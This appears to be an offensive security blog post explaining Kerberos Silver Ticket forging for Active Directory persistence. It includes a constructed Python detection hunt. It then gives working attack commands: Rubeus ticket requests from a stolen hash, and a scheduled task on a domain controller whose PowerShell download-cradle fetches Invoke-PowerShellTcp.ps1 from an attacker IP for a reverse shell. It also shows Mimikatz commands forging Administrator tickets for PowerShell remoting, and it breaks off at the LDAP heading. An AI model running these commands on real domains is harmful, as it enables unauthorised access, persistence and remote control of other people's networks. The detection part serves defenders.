While most of the attention goes towards Golden Tickets as a means of persistence, Silver Tickets are also an effective method, and arguably quieter as well.
The difference is that while Golden Tickets give you a much larger scope, a Silver Ticket limits your access to the single service you wish to target.
Silver Tickets can be forged to gain access to a service in Active Directory if you are able to obtain the password hash of the service account running that service. That is because Ticket Granting Service (TGS) tickets are signed and encrypted with the hash of the account running the service, so having that hash lets you forge TGS tickets.
It should be noted that Silver Tickets can be forged not only from the hashes of service accounts but from computer account hashes as well, since these accounts run many services on the machine (such as CIFS) as the local system. The computer hash does not have to be that of a Domain Controller; a computer that has access to the Domain Controller via group membership works as well.
Just like Golden Tickets, the forged ticket can be created on behalf of any user, including fake accounts.
If the Privilege Attribute Certificate (PAC) inside the TGS ticket is not validated, it can be manipulated to elevate the account's privileges to those of an administrator.
A common method of obtaining a service account hash is Kerberoasting.
I have already explained the Kerberos authentication mechanism here.
There are 3 reasons why this persistence technique is so effective:
The hash of a service account is easier to obtain than that of the krbtgt account.
It bypasses steps 1-4 of the Kerberos authentication process altogether, meaning that forging a ticket requires no communication whatsoever with the Domain Controller. Log events will only be seen on the machines running the services you want to gain access to.
While computer account passwords are typically changed every 30 days, this can be disabled[1]. Regardless, 30 days of persistence with this hash is still a reasonable amount of time.
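The logging point above is also the detection angle: a forged ticket is presented straight to the service host, so that host records a Kerberos network logon (event 4624, logon type 3) while no Domain Controller records the matching TGS request (event 4769). The following hunt is an added example, not part of the original post; it assumes 4624 and 4769 events have been collected centrally and simplified into dicts, and it uses constructed sample events and a constructed account list, not real logs. It also flags logons by accounts that do not exist in the domain, which covers the fake-account case mentioned earlier.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs); dicts stand in for the EVTX fields.
SERVER_4624 = [  # Kerberos network logons recorded on member servers
    {"time": "2024-03-01T10:00:05", "host": "srv01", "user": "alice",
     "ip": "10.0.0.21", "logon_type": 3, "auth_package": "Kerberos"},
    {"time": "2024-03-01T10:30:00", "host": "srv01", "user": "Administrator",
     "ip": "10.0.0.99", "logon_type": 3, "auth_package": "Kerberos"},
    {"time": "2024-03-01T10:45:00", "host": "srv01", "user": "svc_backup",
     "ip": "10.0.0.99", "logon_type": 3, "auth_package": "Kerberos"},
    {"time": "2024-03-01T11:00:00", "host": "srv02", "user": "bob",
     "ip": "10.0.0.30", "logon_type": 3, "auth_package": "NTLM"},
]
DC_4769 = [  # TGS requests recorded on the domain controllers
    {"time": "2024-03-01T09:59:40", "user": "alice@CORP.LOCAL",
     "ip": "::ffff:10.0.0.21", "service": "cifs/srv01"},
]
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}  # constructed AD export

def _ts(s):
    return datetime.fromisoformat(s)

def _norm_ip(ip):
    return ip.rsplit(":", 1)[-1]  # strip the IPv4-mapped prefix 4769 often carries

def find_silver_ticket_candidates(server_events, dc_events, known_accounts,
                                  window=timedelta(hours=10)):
    """Return (event, reason) for 4624 Kerberos logons whose account does not
    exist, or for which no 4769 was logged on any DC within `window` before the
    logon (the DC was never asked for a ticket). The default window matches the
    default maximum service ticket lifetime, since cached tickets are reused."""
    hits = []
    for ev in server_events:
        if ev["logon_type"] != 3 or ev["auth_package"] != "Kerberos":
            continue  # only Kerberos network logons are ticket-backed
        user = ev["user"].lower()
        t = _ts(ev["time"])
        if user not in known_accounts:
            hits.append((ev, "account does not exist in AD"))
            continue
        issued = any(
            r["user"].split("@")[0].lower() == user
            and _norm_ip(r["ip"]) == ev["ip"]
            and t - window <= _ts(r["time"]) <= t
            for r in dc_events
        )
        if not issued:
            hits.append((ev, "no TGS request (4769) seen on any DC"))
    return hits

if __name__ == "__main__":
    for ev, why in find_silver_ticket_candidates(SERVER_4624, DC_4769, KNOWN_ACCOUNTS):
        print(f"{ev['time']} {ev['host']} {ev['user']} from {ev['ip']}: {why}")
```

The correlation is only as good as the 4769 coverage: a gap in collection from any one DC produces false positives, so run it only where every DC forwards its security log.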
With Rubeus.exe
# First request a TGT
.\Rubeus.exe asktgt /user:<user> /rc4:<hash>
# Then request a TGS
.\Rubeus.exe asktgs /ticket:<b64_ticket> /service:<service>/<domain>[,<service2>/<domain>] /ptt
# setup the scheduled task
schtasks /create /S <dc_domain> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<name>" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://<ip>/Invoke-PowerShellTcp.ps1''')'"
# then run it and wait for your reverse shell
schtasks /Run /S <dc_domain> /TN "<name>"
# if you want to end or delete the task:
schtasks /End /S <dc_domain> /TN "<name>"
schtasks /delete /S <dc_domain> /TN "<name>"
Using Silver Tickets to Create a New PowerShell Remoting Session
This attack requires two tickets, one for the HTTP SPN and the other for the WSMAN SPN.
# Create a ticket for the HTTP Service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:HTTP /rc4:<computer-hash> /user:Administrator /ptt"'
# Now for the wsman SPN
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain-SID> /target:<dc.domain> /service:WSMAN /rc4:<computer-hash> /user:Administrator /ptt"'
# check that the tickets were created
klist
# Then enter a new session
$sess = New-PSSession -ComputerName <computer>
Enter-PSSession -Session $sess
Using Silver Tickets to Gain Access to LDAP Services